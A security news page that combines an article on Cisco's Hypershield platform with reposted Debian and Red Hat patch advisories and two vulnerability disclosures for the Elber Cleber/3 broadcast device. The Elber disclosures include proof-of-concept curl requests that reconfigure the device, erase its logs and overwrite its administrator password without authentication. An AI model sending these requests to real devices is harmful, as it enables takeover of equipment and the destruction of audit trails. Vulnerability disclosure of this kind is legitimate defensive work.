The tech giant tosses together a word salad of today's business drivers — AI, cloud-native, digital twins — and describes a comprehensive security strategy for the future, but can the company build the promised platform?

Source: Peach Shutterstock via Shutterstock

The cybersecurity industry has no shortage of problems: Attackers are using automation to shorten their time to exploit, patching software is burdensome, establishing defenses such as segmentation remains difficult, and a shortage of cybersecurity-skilled workers holds back efforts in all of these areas.

No wonder, then, that Cisco has decided to launch an AI-powered, distributed security platform for protecting cloud workloads and artificial intelligence (AI) systems from cybersecurity threats. Dubbed Hypershield, the platform will push security out to the edge, using AI-augmented agents to maintain security controls around every workload in the data center and even distributed, connected devices. Cisco says the platform will be able to patch environments automatically, test software updates within the environment using simulated systems known as digital twins, and block attacks by detecting anomalous behavior.

Hyperbole was not in short supply, and "reimagined" seemed to be the word of the day.

Jeetu Patel, executive vice president and general manager of Cisco's security and collaboration division, called it "one of the largest platform shifts that we've experienced during our lifetimes."

"For the past gazillion years, when we've looked at security, the advantage has always been on the side of the adversary," Patel said during a press conference announcing Hypershield. "We are now approaching an era ... where ... because \[of this platform\], you might have a world where you might have an advantage as a defender, and wouldn't that be a wonderful world to live in."

Cybersecurity is certainly a field that could benefit from using AI for augmentation or as an assistant, and pushing security to the distributed edge — closer to the devices to be secured — can help simplify some aspects of vast networks that need to be secured.

The company's choice of technologies makes sense, says David Holmes, a principal analyst with Forrester Research. By using eBPF, a technology that allows sandboxed programs to run in a privileged context, pieces of the workload can be instrumented, and data processing units (DPUs) allow efficient processing of data using high-bandwidth network interfaces.

"They are describing a more modern approach to building a private cloud data center architecture, and that’s good," Holmes says. "eBPF for automation \[and\] security, container-like workloads — their DPUs — overall, this is good for the industry if they pull it off."

**Digital Twins Allow Automated Patching**

Craig Connors, chief technology officer of Cisco's security business group, demonstrated how a workload or application could be automatically patched and run in parallel using digital-twin technology to test the stability and correctness of the updated software. Digital twins are simulations — originally used in product development and manufacturing — that allow software engineers to test and observe a version of a device or application.

If patched code passes all tests and satisfies policies, then it can be promoted to production, Connors said during the demonstration.

"What we've done is we've essentially introduced the digital twin into every enforcement point that we deploy," Connors stated. "So we're actually bringing CI/CD \[continuous integration and continuous delivery\] to the embedded world by running the end-of-the-promotion pipeline as a digital twin on every single enforcement point for every single customer in the world in a transparent way. That allows us to test every possible combination that could happen in your real environment everywhere."

While the company will start with Linux environments, Cisco hinted at future plans to support other operating systems.

The same digital-twin approach can be applied to developing segmentation policies for networks of devices and workloads, according to Connors. The AI assistant built into the Hypershield platform could recommend microsegmentation policies and give a confidence score that each policy would behave well inside a given environment.

"Imagine if AI wasn't just recommending microsegmentation policies, but it was modeling them in a digital twin of your environment, and telling you exactly how it tested those policies to make sure they were correct before it recommended them to you," Connors said. "So we're really trying to bring that trust aspect in and not just 'AI bomb' you with recommendations."

**Distributed Exploit Protection**

Cisco says the platform will also protect against exploits in real time by using threat intelligence to inform anomaly detection and response. Because companies never know which vulnerabilities will be picked up by an attacker, the system allows all high-impact vulnerabilities to be treated the same.

This approach benefits companies with legacy hardware and software that has reached end of life and is no longer receiving updates, according to Connors.

"There are cases where we can never patch. ... Let's say the software's end of life, but my business still relies on it and a critical vulnerability exists," Connors said. "So while these are intended to be short-lived patches to bridge that gap between that availability and patch deployment and then we'll automatically pull back these distributed shields, it is potentially feasible that you may want to run this for the life of the application to continue protecting you against \[exploitation\]."

Having the vision and individual technologies is a good first step, but like the platform managing driver-assist features in cars, the trick is how it all comes together, says Jon Oltsik, analyst emeritus at Enterprise Strategy Group. Coordinating the pieces across multiple systems, rather than looking at each one in isolation — as well as figuring out "normal" activity — and then responding will be tricky.

"It's a good goal, but a lot of things need to come together to make it happen, including user buy-in," he says. "AI-based security must go through rigorous testing and be proven in the field before security professionals will trust it."

Cisco has promised the platform will be generally available by August.

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Cisco's Complex Road to Deliver on Its Hypershield Promise

Debian Linux Security Advisory 5665-1 - Several security vulnerabilities have been discovered in the Tomcat servlet and JSP engine.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5665-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
April 17, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : tomcat10  
CVE ID         : CVE-2023-46589 CVE-2024-23672 CVE-2024-24549  
Debian Bug     : 1057082 1066877 1066878

Several security vulnerabilities have been discovered in the Tomcat  
servlet and JSP engine.

CVE-2023-46589

    Tomcat 10 did not correctly parse HTTP trailer headers. A trailer header  
    that exceeded the header size limit could cause Tomcat to treat a single  
    request as multiple requests leading to the possibility of request  
    smuggling when behind a reverse proxy.

CVE-2024-24549

     Denial of Service due to improper input validation vulnerability for  
     HTTP/2. When processing an HTTP/2 request, if the request exceeded any of  
     the configured limits for headers, the associated HTTP/2 stream was not  
     reset until after all of the headers had been processed.

CVE-2024-23672

     Denial of Service via incomplete cleanup vulnerability. It was possible  
     for WebSocket clients to keep WebSocket connections open leading to  
     increased resource consumption.

For the stable distribution (bookworm), these problems have been fixed in  
version 10.1.6-1+deb12u2.

We recommend that you upgrade your tomcat10 packages.

For the detailed security status of tomcat10 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/tomcat10

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmYgQdpfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRxWg/9HomYTHhhPpVv0BwAECG399S7910TgHArULALOMKdpHjJLmi4PvNoB/u+  
7KwKWdpULjOr4z0YMmxyI6eMHYEgJAEHlZpSzGRt2Sue12g0ouSLJ7//jvfJcI6b  
5JnzFdZQQYoGocfIgHczcKGooMDjaujmTuf/bA2tVV+X5gO0QYWGnbr7MLd0y4PC  
a8KaLGNJcGDSkN2nCFgEi2mMBZP++sEA+TyJJV6cOHyvnXEoD9/wk6IwFos4kDQT  
y3qbYtRGUwtg/frQ7iS8EtkpK8vHcjflPrtQTvfGLALdXV50RpOOgeIIKOecFs2v  
PtJp3dEg4L/cWNlPwLVsisYN6gC+pa6z3GoAg5J2O5d9xar+pJQeYLx9WozlGvkL  
NVVzvj6p30yQOxINtes2xG9pqPOM7alLQl6VjUxm8DVSCne4NKlK32HAyh8Uxi4R  
V+3nqTPRNeN+3bLeztCOeo/9oxSTkXDDqB9TT3rFooZpP3bpaUH2B37lOONcg/55  
+WTTgh8bM8f8MlmOMYqz3IihrxW0WJlgE5oR2vCNwxb8a3ec4GhwdCV5/Sr3LxEJ  
YkURiWyUE37/OuZB/TnTg26HWcctJJpV+//JOTslRWBr0qXIg6PrMIwYYtTYZwXp  
U8mmX8cIQVdHQoFvYrJuQz4J74sjDRIddo5rWB7bXXJQEuxcBrs=  
=WEw1  
-----END PGP SIGNATURE-----

Debian Security Advisory 5665-1

Debian Linux Security Advisory 5664-1 - Jetty 9 is a Java based web server and servlet engine. It was discovered that remote attackers may leave many HTTP/2 connections in ESTABLISHED state (not closed), TCP congested and idle. Eventually the server will stop accepting new connections from valid clients which can cause a denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5664-1                   security@debian.orghttps://www.debian.org/security/                          Markus KoschanyApril 17, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : jetty9CVE ID         : CVE-2024-22201Jetty 9 is a Java based web server and servlet engine. It was discovered thatremote attackers may leave many HTTP/2 connections in ESTABLISHED state (notclosed), TCP congested and idle. Eventually the server will stop accepting newconnections from valid clients which can cause a denial of service.For the oldstable distribution (bullseye), this problem has been fixedin version 9.4.50-4+deb11u2.For the stable distribution (bookworm), this problem has been fixed inversion 9.4.50-4+deb12u3.We recommend that you upgrade your jetty9 packages.For the detailed security status of jetty9 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/jetty9Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmYgPqhfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFDRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7UeS8Wg/+JvDyNdRq1Tu6rEqfHprMuxVifvPSH4RefpWMVY1MUIwRSxCyL9GEKCtuq0a+Vf/JycNVbTcRB0n/UpgFdCCWE6dUngLIoYX/SmA+dXKLN9a+FIKj/aivOvOrCUEkaJiVBjARYoBxDzoLG8STAJkxJvCAIduOSZ4Pr3iaZ+3+mHLpz38aAHz7QCXSNoqaD66hMTCVPnVTTr3CvrhCIjcdxQRteJwkJ0XxT5WxYSBmVuB+zEAxHUt6ocv25bMel+B4OMcNrRrdQiUtqAF2i7ktAPO2HUo5+9kxYCwkB1DbgIEhdtkA6aBtTYZ0ZJbx4kV206DrQO7PjLzbY6RA2o2EiNb1zEZlaaFuGq6ctIpR52PplC0sEPUTVbDHLlDAQUIXzmmJGhD2etF5dpknbBTcAhUjGebCiasqwZ8HWiVUeIEwi89je7+CThjB3phSjyzqZivdkpYiZTApy3UU3lzXHViCtTIverkaQNoYExWVCKihvMRtSAlhw4b0ukEt+PNzrgl2N0M3bYh1oEh+TGqiP961Je38l5756wKLSxgzfTwTlrPmH6BFwhkFEnMxzjX4jvRWkVC2Yz4/DiJnRnAEjS3iOsvvDnP/lZkWZOXMT3TY0bRJSwUuEgCcNPF/PE/q6KRtzyxJLuTOFRwk/xob/q4GucD+RuqwHEC2w3fN7WE==HK3G-----END PGP SIGNATURE-----

Debian Security Advisory 5664-1

Elber Cleber/3 Broadcast Multi-Purpose Platform version 1.0.0 suffers from an unauthenticated device configuration and client-side hidden functionality disclosure vulnerability.

  
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Device Config

Vendor: Elber S.r.l.  
Product web page: https://www.elber.it  
Affected version: 1.0.0 Revision 7304  
                  1.0.0 Revision 7284  
                  1.0.0 Revision 6505  
                  1.0.0 Revision 6332  
                  1.0.0 Revision 6258  
                  XS2DAB v1.50 rev 6267

Summary: Cleber offers a powerful, flexible and modular hardware and  
software platform for broadcasting and contribution networks where  
customers can install up to six boards with no limitations in terms  
of position or number. Based on a Linux embedded OS, it detects the  
presence of the boards and shows the related control interface to the  
user, either through web GUI and Touchscreen TFT display. Power supply  
can be single (AC and/or DC) or dual (hot swappable for redundancy);  
customer may chose between two ranges for DC sources, that is 22-65  
or 10-36 Vdc for site or DSNG applications.

Desc: The device suffers from an unauthenticated device configuration and  
client-side hidden functionality disclosure.

Tested on: NBFM Controller  
           embOS/IP

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5817  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5817.php

18.08.2023

--

# Config fan  
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='  
Configuration applied

# Delete config  
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'  
File delete successfully

# Launch upgrade  
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'  
Upgrade launched Successfully

# Log erase  
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'  
Logs erased

# Until:  
# =0 ALL  
# =-2 Yesterday  
# =-8 Last week  
# =-15 Last two weeks  
# =-22 Last three weeks  
# =-31 Last month

# Set RX config  
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'  
RX Config Applied Successfully

# Show factory window and FPGA upload (Console)  
> cleber_show_factory_wnd()

# Etc.

Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Insecure Direct Object Reference

Elber Cleber/3 Broadcast Multi-Purpose Platform version 1.0.0 suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security.

    Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication BypassVendor: Elber S.r.l.Product web page: https://www.elber.itAffected version: 1.0.0 Revision 7304                  1.0.0 Revision 7284                  1.0.0 Revision 6505                  1.0.0 Revision 6332                  1.0.0 Revision 6258                  XS2DAB v1.50 rev 6267Summary: Cleber offers a powerful, flexible and modular hardware andsoftware platform for broadcasting and contribution networks wherecustomers can install up to six boards with no limitations in termsof position or number. Based on a Linux embedded OS, it detects thepresence of the boards and shows the related control interface to theuser, either through web GUI and Touchscreen TFT display. Power supplycan be single (AC and/or DC) or dual (hot swappable for redundancy);customer may chose between two ranges for DC sources, that is 22-65or 10-36 Vdc for site or DSNG applications.Desc: The device suffers from an authentication bypass vulnerability througha direct and unauthorized access to the password management functionality. Theissue allows attackers to bypass authentication by manipulating the set_pwdendpoint that enables them to overwrite the password of any user within thesystem. This grants unauthorized and administrative access to protected areasof the application compromising the device's system security.--------------------------------------------------------------------------/modules/pwd.html------------------50: function apply_pwd(level, pwd)51: {52:   $.get("json_data/set_pwd", {lev:level, pass:pwd},53:   function(data){54:     //$.alert({title:'Operation',text:data});55:     show_message(data);56:   }).fail(function(error){57:     show_message('Error ' + error.status, 'error');58:   });59: }--------------------------------------------------------------------------Tested on: NBFM Controller           embOS/IPVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5816Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5816.php18.08.2023--$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234Ref (lev param):Level 7 = SNMP Write Community (snmp_write_pwd)Level 6 = SNMP Read Community (snmp_read_pwd)Level 5 = Custom Password? hidden. (custom_pwd)Level 4 = Display Password (display_pwd)?Level 2 = Administrator Password (admin_pwd)Level 1 = Super User Password (puser_pwd)Level 0 = User Password (user_pwd)

Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass

Red Hat Security Advisory 2024-1904-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1904.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: firefox security updateAdvisory ID:        RHSA-2024:1904-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1904Issue date:         2024-04-18Revision:           03CVE Names:          CVE-2024-2609====================================================================Summary: An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.10.0 ESR.Security Fix(es):  * GetBoundName in the JIT returned the wrong object (CVE-2024-3852)* Out-of-bounds-read after mis-optimized switch statement (CVE-2024-3854)* Incorrect JITting of arguments led to use-after-free during garbage collection (CVE-2024-3857)* Permission prompt input delay could expire when not in focus (CVE-2024-2609)* Integer-overflow led to out-of-bounds-read in the OpenType sanitizer (CVE-2024-3859)* Potential use-after-free due to AlignedBuffer self-move (CVE-2024-3861)* Memory safety bug fixed in Firefox 125, Firefox ESR 115.10, and Thunderbird 115.10 (CVE-2024-3864)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-2609References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2275547https://bugzilla.redhat.com/show_bug.cgi?id=2275549https://bugzilla.redhat.com/show_bug.cgi?id=2275550https://bugzilla.redhat.com/show_bug.cgi?id=2275551https://bugzilla.redhat.com/show_bug.cgi?id=2275552https://bugzilla.redhat.com/show_bug.cgi?id=2275553https://bugzilla.redhat.com/show_bug.cgi?id=2275555

Red Hat Security Advisory 2024-1904-03

Red Hat Security Advisory 2024-1883-03 - An update for shim is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include buffer overflow, bypass, integer overflow, and out of bounds read vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1883.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: shim security update  
Advisory ID:        RHSA-2024:1883-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1883  
Issue date:         2024-04-18  
Revision:           03  
CVE Names:          CVE-2023-40546  
====================================================================

Summary: 

An update for shim is now available for Red Hat Enterprise Linux 8.8 Extended  
Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The shim package contains a first-stage UEFI boot loader that handles chaining  
to a trusted full boot loader under secure boot environments.

Security Fix(es):

* shim: RCE in http boot support may lead to Secure Boot bypass (CVE-2023-40547)

* shim: Interger overflow leads to heap buffer overflow in verify_sbat_section  
on 32-bits systems (CVE-2023-40548)

* shim: Out-of-bounds read printing error messages (CVE-2023-40546)

* shim: Out-of-bounds read in verify_buffer_authenticode() malformed PE file  
(CVE-2023-40549)

* shim: Out-of-bound read in verify_buffer_sbat() (CVE-2023-40550)

* shim: out of bounds read when parsing MZ binaries (CVE-2023-40551)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-40546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2234589  
https://bugzilla.redhat.com/show_bug.cgi?id=2241782  
https://bugzilla.redhat.com/show_bug.cgi?id=2241796  
https://bugzilla.redhat.com/show_bug.cgi?id=2241797  
https://bugzilla.redhat.com/show_bug.cgi?id=2259915  
https://bugzilla.redhat.com/show_bug.cgi?id=2259918

Red Hat Security Advisory 2024-1883-03

Red Hat Security Advisory 2024-1882-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1882.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel-rt security and bug fix update  
Advisory ID:        RHSA-2024:1882-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1882  
Issue date:         2024-04-18  
Revision:           03  
CVE Names:          CVE-2023-6240  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: Marvin vulnerability side-channel leakage in the RSA decryption operation (CVE-2023-6240)

* kernel: tls: use-after-free with partial reads and async decrypt (CVE-2024-26582)

* kernel: tls: handle backlogging of crypto requests (CVE-2024-26584)

* kernel: mlxsw: spectrum_acl_tcam: Fix stack corruption (CVE-2024-26586)

Bug Fix(es):

* kernel-rt: kernel: mlxsw: spectrum_acl_tcam: Fix stack corruption (JIRA:RHEL-29214)

* kernel-rt: update RT source tree to the latest RHEL-9.2 ad hoc schedule build (JIRA:RHEL-30439)

* kernel-rt: kernel: tls: use-after-free with partial reads and async decrypt (JIRA:RHEL-26399)

* kernel-rt: kernel: Marvin vulnerability side-channel leakage in the RSA decryption operation (JIRA:RHEL-29687)

* kernel-rt: kernel: tls: handle backlogging of crypto requests (JIRA:RHEL-30451)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6240

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2250843  
https://bugzilla.redhat.com/show_bug.cgi?id=2265518  
https://bugzilla.redhat.com/show_bug.cgi?id=2265519  
https://bugzilla.redhat.com/show_bug.cgi?id=2265645

Red Hat Security Advisory 2024-1882-03

Red Hat Security Advisory 2024-1881-03 - An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include null pointer and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1881.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel security and bug fix update  
Advisory ID:        RHSA-2024:1881-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1881  
Issue date:         2024-04-18  
Revision:           03  
CVE Names:          CVE-2023-6240  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: Marvin vulnerability side-channel leakage in the RSA decryption operation (CVE-2023-6240)

* kernel: tls: use-after-free with partial reads and async decrypt (CVE-2024-26582)

* kernel: tls: handle backlogging of crypto requests (CVE-2024-26584)

* kernel: mlxsw: spectrum_acl_tcam: Fix stack corruption (CVE-2024-26586)

Bug Fix(es):

* [Lenovo RHEL9] Realtek patch for P1 G6 Audio (BZ#2208068)

* Please integrate commit b949ee6801f4 (\"powerpc/fadump: invoke ibm,os-term with rtas_call_unlocked()\") (JIRA:RHEL-17106)

* PVT:1050:XM:Nimitz Linux EEH Nimitz - After FATAL Injection BIT 13 on D10 Register, unable to see the htx traffic status after long time (JIRA:RHEL-22413)

* RHEL9.2 - Performance Degradation in the Case of Asymmetric Scheduler Domains in Linux (JIRA:RHEL-24862)

* kernel: mlxsw: spectrum_acl_tcam: Fix stack corruption (JIRA:RHEL-29186)

*  kernel NULL pointer dereference from nvme_fc_io_getuuid+0xc/0x30 [nvme_fc] (JIRA:RHEL-29221)

* sched_setaffinity(2) returns undocumented error ENODEV (JIRA:RHEL-21140)

* kernel: tls: use-after-free with partial reads and async decrypt (JIRA:RHEL-26396)

* kernel: Marvin vulnerability side-channel leakage in the RSA decryption operation (JIRA:RHEL-27840)

* sched_setaffinity(2) doesn't return -1 for an empty mask (JIRA:RHEL-29540)

* [EMR] [TBOOT OS] SUT could not go to S3 state with RHEL 9.2 Tboot OS One CPU return -16 running BUSY (JIRA:RHEL-29665)

* ipoib mcast lockup fix (JIRA:RHEL-29923)

* ice 0000:6f:00.0: PTP failed to get time (JIRA:RHEL-30108)

* blk-mq: don't schedule blk-mq kworkers on isolated CPUs (JIRA:RHEL-30418)

* kernel: tls: handle backlogging of crypto requests (JIRA:RHEL-30450)

* Kernel panic in skb_segment (JIRA:RHEL-30561)

* [IBM 9.4 FEAT] Update IBM vNIC Driver (ibmvnic) (JIRA:RHEL-28648)

* SCTP OOTB scenario in OVS/Netfilter where the SCTP connection can not be recovered by HB_REQ/HB_ACK (JIRA:RHEL-29949)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6240

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2250843  
https://bugzilla.redhat.com/show_bug.cgi?id=2265518  
https://bugzilla.redhat.com/show_bug.cgi?id=2265519  
https://bugzilla.redhat.com/show_bug.cgi?id=2265645

Red Hat Security Advisory 2024-1881-03

Red Hat Security Advisory 2024-1880-03 - An update for the nodejs:18 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include denial of service and privilege escalation vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1880.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: nodejs:18 security update  
Advisory ID:        RHSA-2024:1880-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1880  
Issue date:         2024-04-18  
Revision:           03  
CVE Names:          CVE-2023-46809  
====================================================================

Summary: 

An update for the nodejs:18 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of  
Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

Security Fix(es):

* nodejs:18/nodejs: reading unprocessed HTTP request with unbounded chunk extension allows DoS attacks (CVE-2024-22019)

* nodejs:18/nodejs: vulnerable to timing variant of the Bleichenbacher attack against PKCS#1 v1.5 padding (Marvin) (CVE-2023-46809)

* nodejs:18/nodejs: code injection and privilege escalation through Linux capabilities (CVE-2024-21892)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-46809

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2264569  
https://bugzilla.redhat.com/show_bug.cgi?id=2264574  
https://bugzilla.redhat.com/show_bug.cgi?id=2264582

Tag

#linux